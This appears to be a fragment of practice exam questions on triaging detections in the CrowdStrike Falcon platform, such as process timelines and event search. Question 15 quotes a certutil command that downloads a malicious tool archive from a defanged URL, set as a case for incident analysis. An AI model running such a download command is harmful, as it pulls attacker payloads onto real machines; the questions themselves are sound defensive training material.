Question 11

Detections in Falcon are classified by their origin. Which of the following is NOT a recognized type of detection?
  • Question 12

    What types of events are returned by a Process Timeline?
  • Question 13

    What does the Full Detection Details option provide?
  • Question 14

    What does pivoting to an Event Search from a detection do?
  • Question 15

    You receive a detection on certutil.exe executing the following command line:
    certutil -urlcache -split -f " hxxps[:]//github[.] com/Endizz/Payloads/raw/main/MyMaliciousTools.zip " " MyMaliciousTools.zip " What is the appropriate next step to discover how this occurred?